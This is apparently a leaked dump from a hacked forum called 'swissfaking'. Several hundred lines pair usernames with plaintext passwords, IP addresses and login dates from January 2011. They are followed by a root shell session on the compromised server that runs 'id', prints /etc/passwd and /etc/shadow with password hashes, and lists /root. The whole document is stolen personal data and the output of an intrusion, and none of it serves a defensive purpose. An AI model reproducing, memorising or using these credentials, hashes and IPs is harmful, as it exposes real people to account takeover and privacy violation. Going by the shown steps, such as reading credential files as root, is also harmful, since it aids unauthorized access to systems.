mixer:@:s9#Ze;L61MXZT=,"RRS:L>j`,}} :213.232.200.177:January 3, 2011, 7:30 pm
pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm
fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm
tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm
china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm
ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm
rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm
slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am
punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm
lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm
fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am
d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm
tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm
solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm
beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm
pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am
curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm
jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm
justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm
du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm
dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm
prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am
winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm
tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm
cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm
wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am
juan:55555:217.23.6.162:January 3, 2011, 6:24 pm
fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm
nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm
jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm
nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm
theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm
corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm
s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm
speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am
die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm
goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm
devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm
fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm
ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm
imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm
secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am
seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm
mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm
sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm
famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm
psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm
trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm
pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm
n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm
txto:123456:88.67.188.148:January 3, 2011, 2:17 am
mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am
daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm
sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am
dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm
weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm
fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm
devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm
lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm
zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm
ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm
stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm
ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am
hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm
michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm
lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm
paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm
simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am
dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm
raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am
janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm
crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm
paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm
bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm
nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am
freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm
loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am
phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm
hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am
alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm
silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm
christian:123456:78.42.172.154:January 2, 2011, 10:05 pm
batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm
jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am
oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm
vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm
killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm
run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm
1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm
king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm
basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm
deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm
ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm
delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm
jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm
icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm
tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm
mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am
peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am
tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am
nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am
shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm
edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm
w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm
d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am
sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm
infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm
nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am
nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm
selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm
smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am
ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm
boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm
siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm
deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm
ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am
kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm
xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am
ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am
anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm
garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm
spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm
z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am
prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm
itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm
leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm
m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm
danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am
rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm
accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am
st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm
wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm
jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm
sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am
deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm
playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm
cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm
mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm
br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm
saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm
peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am
mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am
keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm
cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am
tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm
logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm
inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm
djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm
fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am
w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm
achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm
acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am
h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm
franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm
blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm
chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am
flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm
kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm
mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am
n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm
kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am
raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm
binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm
blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm
armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm
zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm
n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am
hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm
ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm
spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm
kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm
sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm
joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm
syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am
afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am
master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm
inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm
smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm
cch:anit77:93.232.245.48:January 6, 2011, 12:38 am
ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm
moses908:161286:178.142.75.51:January 3, 2011, 3:17 am
sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm
eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm
kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm
jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm
m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm
insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm
psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm
jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm
reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm
xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm
gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm
nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm
yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am
bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm
dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am
ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am
3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm
nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm
3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm
erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm
mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm
darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am
paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm
devil234:R/m<7ctN&AEr<TF;@zg$:80.108.246.5:January 3, 2011, 2:04 pm
miro:lollollol:94.79.189.112:January 2, 2011, 9:05 pm
apocalypsee:dielupe:84.19.169.162:January 6, 2011, 5:17 am
managarm:chris16:217.237.95.167:January 2, 2011, 11:39 pm
supporter:sniFFerg56:84.168.214.42:January 4, 2011, 1:29 am
razr:225-xdA6225-xdA6:213.186.121.4:January 3, 2011, 5:01 pm
zap:s5hfQdBKWJ:69.164.192.139:January 2, 2011, 9:25 pm
craig:123456:93.245.172.207:January 3, 2011, 12:31 pm
xam4:meins1234:79.240.184.187:January 2, 2011, 9:52 pm
weedstar:1231231231337:82.195.232.218:January 3, 2011, 2:54 am
rotefahne:pw&Gzz%r%uZsr:188.102.220.242:January 3, 2011, 11:09 pm
holzmen:FJhEIh$=g/G(Rkg\7F4Z:82.195.232.218:January 2, 2011, 9:17 pm
burner:stick4you11:82.113.121.144:January 3, 2011, 12:18 am
c-klasse:chbchb:79.197.208.32:January 4, 2011, 3:25 pm
tahirciq:LC8U.J&yY$/-Atdd:78.35.128.157:January 3, 2011, 12:00 pm
locke:14041987:85.176.206.32:January 3, 2011, 6:49 am
yahomie:Killer7:212.117.163.21:January 5, 2011, 7:57 pm
threexcp:g@ngster@ushh1!:78.54.26.103:January 2, 2011, 9:29 pm
rocker:kleinermann:79.202.35.85:January 2, 2011, 11:03 pm
dudelmaster:Willy10715!:91.51.111.78:January 2, 2011, 9:55 pm
sh4k4l88:12345654321:92.241.165.69:January 2, 2011, 10:18 pm
triggertravis:handball:79.220.232.154:January 3, 2011, 1:02 am
schakal:asdfgh:188.193.148.29:January 4, 2011, 8:29 pm
pogogirl1922:farcry:217.226.116.191:January 3, 2011, 9:08 pm
bierbauer:marius1475963:92.200.0.168:January 3, 2011, 1:02 am
el!t3:ficken123!:195.254.134.10:January 2, 2011, 9:21 pm
logitech551:skmasteresl:188.60.230.19:January 2, 2011, 9:16 pm
darkar:passwort:93.232.249.46:January 3, 2011, 4:31 pm
jimbeam:jimbeam:78.42.66.80:January 2, 2011, 9:41 pm
nazgul19:michael:88.153.2.184:January 5, 2011, 8:46 pm
nexus88:01230123:80.131.83.133:January 3, 2011, 4:00 am
shade:1qaz2ws:84.137.122.147:January 2, 2011, 9:24 pm
wowww:hallo123456789:80.142.199.29:January 2, 2011, 9:08 pm
?fragezeichen?:1q2w3e4r--:87.146.201.33:January 4, 2011, 12:27 pm
krime:yalayala:80.143.17.206:January 4, 2011, 12:08 pm
dlite:payne91:93.209.31.60:January 4, 2011, 4:31 pm
root:peterpan:87.154.115.107:January 5, 2011, 7:53 pm
inf3ct3d:Linkin1Linkin12:88.75.22.107:January 3, 2011, 4:59 pm
starz:123123:41.202.95.240:January 2, 2011, 9:34 pm
ikas:k7gh8uc3ph:77.11.2.14:January 2, 2011, 9:04 pm
normasell:psjDjdsr:213.186.121.4:January 2, 2011, 10:54 pm
asdf-one:asdfjklö:92.241.168.196:January 6, 2011, 2:06 am
hacksyndrom:dubastard!!:94.220.218.178:January 2, 2011, 9:50 pm
ashame:snatschi88:62.143.177.224:January 4, 2011, 4:29 pm
cyber-----dance:hdgdla:92.241.165.69:January 3, 2011, 11:22 pm
slyfar:123321:87.179.68.246:January 3, 2011, 9:28 pm
sutekh:SA/DZ)(AZD8za9sdz97AZSD/)(azsd:195.254.134.194:January 3, 2011, 6:34 pm
noob@pc:12345:94.216.12.141:January 4, 2011, 8:57 am
bloodyloody:123456:91.58.69.21:January 5, 2011, 12:52 pm
stay:sic:ricco123:92.75.239.233:January 3, 2011, 5:41 pm
armageddon:Dmre6PJH:93.217.26.195:January 2, 2011, 9:31 pm
taironbc:leet1337:188.98.230.183:January 2, 2011, 9:37 pm
haze50:streetshok50:89.204.153.130:January 3, 2011, 10:19 pm
king18:meradil18:90.136.196.113:January 2, 2011, 11:35 pm
bonnie:A131839k:89.217.13.29:January 5, 2011, 5:44 pm
anilman:col123456:46.5.147.97:January 3, 2011, 4:12 am
wh!t3-sh33p:['H']4xOR!?:217.23.6.162:January 2, 2011, 10:01 pm
nightyshine:oni-link:91.44.169.222:January 5, 2011, 10:25 am
1067riddick:fuckyou123:86.56.44.88:January 3, 2011, 12:00 am
kingof:0VYGSLda9vpD:89.236.172.149:January 3, 2011, 6:35 pm
hkg44:cracker44:2.210.65.152:January 2, 2011, 9:54 pm
ultra:lollol:84.60.213.70:January 3, 2011, 6:19 pm
hans:A2f5V26f55F2v6s2d1f2s3cF:178.239.51.80:January 3, 2011, 1:27 pm
stevy:berlin123:91.64.195.245:January 3, 2011, 12:10 pm
mrmandato:qwqwqwqw1:188.108.51.104:January 3, 2011, 5:23 pm
rave:3Wur7CeiRZ2g25nNUmmk:178.239.51.80:January 3, 2011, 4:44 pm
kassur:Freak1990.:91.4.51.142:January 2, 2011, 9:16 pm
sc0field:3cult0r:84.158.49.55:January 3, 2011, 1:44 am
czok:dogdog:178.26.76.90:January 2, 2011, 9:02 pm
royalus:silvas4436:92.241.190.253:January 2, 2011, 11:15 pm
s.ibrahimovic:PorscheCayenne350:92.241.168.24:January 3, 2011, 1:59 pm
ixxten:passwort001sirboss001:212.117.162.222:January 2, 2011, 9:05 pm
ninjai:ramona62:95.208.33.97:January 3, 2011, 2:57 pm
ghettolive:rexangel1:79.197.208.159:January 3, 2011, 7:36 pm
elkasino:mentos123:81.210.229.154:January 2, 2011, 10:11 pm
naik:c13g4:80.136.48.37:January 3, 2011, 12:20 am
hephaistos:android3:217.87.198.35:January 2, 2011, 10:31 pm
skywalker:02662650:91.19.122.142:January 5, 2011, 5:40 pm
back_space:timpfaff:92.241.168.196:January 6, 2011, 2:11 am
leetcru:cocacola22:188.194.106.119:January 3, 2011, 2:42 pm
m18:trustno02:188.103.64.45:January 2, 2011, 9:58 pm
cypress:qLLij#iW:hZeE:!Y:178.39.186.63:January 2, 2011, 9:03 pm
legend:666199:88.64.128.12:January 3, 2011, 3:35 am
coastar:computer1212:93.135.175.210:January 5, 2011, 10:25 pm
hustler71:88108810:46.115.15.139:January 3, 2011, 10:17 am
eisernegarde:silvio0603:88.70.73.27:January 2, 2011, 9:58 pm
panno:fJZj471W:79.198.146.95:January 5, 2011, 10:00 pm
iocn:kirsehir?93:92.201.12.138:January 2, 2011, 9:19 pm
triple:3WEXGAPu:93.190.142.49:January 3, 2011, 2:16 pm
marco88:deutschland:94.134.31.40:January 5, 2011, 3:00 pm
adapter:grundlosigkeit:82.113.121.145:January 2, 2011, 10:25 pm
fakebaba!:monster2206:95.118.64.250:January 6, 2011, 10:32 pm
snap:ilker007:94.216.12.44:January 3, 2011, 5:35 pm
backslash:m1e2dion12345:79.217.153.191:January 2, 2011, 9:43 pm
boki-plati:borislavmilakovic8810horgen:84.227.119.100:January 2, 2011, 9:47 pm
ayran:!crimeisking!:77.180.11.5:January 3, 2011, 2:24 pm
al--big--al:1paypal1:212.23.105.246:January 2, 2011, 9:37 pm
afghanistan:dJKX8TRF:92.226.129.104:January 5, 2011, 3:37 am
cunit156:spermaschleuder:92.241.190.253:January 2, 2011, 10:27 pm
cutsman:hors3th3:69.172.133.147:January 4, 2011, 1:47 pm
fr33m4n:nordschleife89:93.208.75.195:January 2, 2011, 9:14 pm
samsung.no1:gtasanandreas:85.177.156.146:January 2, 2011, 11:22 pm
wacked:N3U35P4$$VV0RD_swissfaking:79.243.167.120:January 3, 2011, 2:32 pm
habbo:colajayswiss:213.232.200.195:January 3, 2011, 7:39 am
long:fÖ5XTfTO0^3YXdbNUr:109.193.89.249:January 2, 2011, 9:16 pm
neocrow:df54!"§$31SD3F1"3"AY§$"!/(:79.218.181.195:January 2, 2011, 9:44 pm
d3adline:megaman2:95.211.13.145:January 2, 2011, 9:18 pm
devil589:devil555:77.180.235.152:January 6, 2011, 3:58 am
knucklez:swiss4ever:84.119.59.21:January 6, 2011, 4:21 pm
1.zocker:12.fifazocker09:178.203.169.75:January 2, 2011, 10:02 pm
loptr:08NmKF8syW:88.66.6.247:January 3, 2011, 2:45 am
chikanooo:CTVX(X):78.42.38.129:January 5, 2011, 10:40 pm
binglly:16211621:77.37.202.47:January 2, 2011, 10:18 pm
revance:sardarmohd:91.7.139.59:January 2, 2011, 11:37 pm
albohak92:jehonatedua:178.203.2.169:January 3, 2011, 11:13 am
player:iphone123:188.99.245.233:January 2, 2011, 9:33 pm
smooch:polen1337:62.143.150.247:January 2, 2011, 9:30 pm
spast08:as132dog184:188.194.117.251:January 4, 2011, 11:32 pm
bobwaly:project-electro:91.41.66.5:January 3, 2011, 5:29 pm
rabbit:onedollar12:93.190.142.49:January 3, 2011, 4:20 pm
profihackeur_:schneewitschen1992:79.253.33.181:January 2, 2011, 11:48 pm
slashx:6gunsnroses9:188.194.33.146:January 3, 2011, 3:36 pm
k-starrr:rahsan:188.195.1.169:January 2, 2011, 9:01 pm
lovetechno:pooltime:89.182.143.105:January 2, 2011, 9:17 pm
breez:fm49vi2dl0:95.128.242.224:January 2, 2011, 10:45 pm
# uname -a
Linux swissfaking 2.6.18-164.11.1.el5.028stab068.5 #1 SMP Mon Mar 15 19:26:36 MSK 2010 i686 athlon i386 GNU/Linux
# id
uid=0(root) gid=0(root)
# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nouser:x:500:500::/home/nouser:/sbin/nologin
lxlabs:x:501:501::/home/lxlabs:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
vpopmail:x:89:89:Vpopmail User:/home/lxadmin/mail:/sbin/nologin
lxpopuser:x:1005:1005:Vpopmail User:/home/lxadmin/mail:/sbin/nologin
alias:x:200:201:qmail alias:/var/qmail/alias:/sbin/nologin
qmaild:x:201:201:qmail daemon:/var/qmail:/sbin/nologin
qmaill:x:202:201:qmail logger:/var/qmail:/sbin/nologin
qmailp:x:203:201:qmail passwd:/var/qmail:/sbin/nologin
qmailq:x:204:201:qmail queue:/var/qmail:/sbin/nologin
qmailr:x:205:201:qmail remote:/var/qmail:/sbin/nologin
qmails:x:206:201:qmail send:/var/qmail:/sbin/nologin
admin:x:1006:1006:System User for admin:/home/admin:/sbin/nologin
clamav:x:46:46:Clam AntiVirus:/tmp:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
lighttpd:x:207:207:lighttpd web server:/var/www/lighttpd:/sbin/nologin
tinydns:x:1007:1007::/home/tinydns:/bin/bash
dnslog:x:1008:1008::/home/dnslog:/bin/bash
dnscache:x:1009:1009::/home/dnscache:/bin/bash
axfrdns:x:1010:1010::/home/axfrdns:/bin/bash
swissfaking:x:1011:1011:System User for swissfaking:/home/swissfaking/:/sbin/nologin
lsadm:x:208:1012::/:/sbin/nologin
root:$1$Kcqod2s0$BmvbgzZXh97NCMPjKYhC8.:14829:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
nouser:!!:14377:0:99999:7:::
lxlabs:!!:14377:0:99999:7:::
distcache:!!:14377::::::
mysql:!!:14377::::::
vpopmail:!!:14377::::::
lxpopuser:!!:14377::::::
alias:!!:14377::::::
qmaild:!!:14377::::::
qmaill:!!:14377::::::
qmailp:!!:14377::::::
qmailq:!!:14377::::::
qmailr:!!:14377::::::
qmails:!!:14377::::::
admin:fYP3xnec:14377:0:99999:7:::
clamav:!!:14377::::::
webalizer:!!:14377::::::
lighttpd:!!:14378::::::
tinydns:!!:14378:0:99999:7:::
dnslog:!!:14378:0:99999:7:::
dnscache:!!:14378:0:99999:7:::
axfrdns:!!:14378:0:99999:7:::
swissfaking:$1$iIjtFFW1$ORA9J9S0/Geqkxrum7EY/0:14701:0:99999:7:::
lsadm:!!:14695::::::
# cd /root && ls -la
total 3516
drwxr-x--- 7 root root 4096 Jan 7 00:15 .
drwxr-xr-x 24 root root 4096 Dec 30 14:33 ..
-rw------- 1 root root 1648 Aug 9 08:43 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwxr-xr-x 16 lxlabs root 4096 Nov 18 2008 .etc
-rw------- 1 root root 46 Jan 2 20:04 .lesshst
-rw------- 1 root root 25 Jan 7 00:15 .mysql_history
-rw------- 1 root root 1024 Mar 27 2010 .rnd
drwx------ 2 root root 4096 Aug 8 19:04 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw------- 1 root root 9584 Jan 7 00:15 .viminfo
drwxr-xr-x 2 root root 4096 Nov 27 06:29 barf
-rw-r--r-- 1 root root 4821 Oct 18 12:07 download.html
drwxr-xr-x 12 1000 users 4096 May 5 2010 lsws-4.0.14
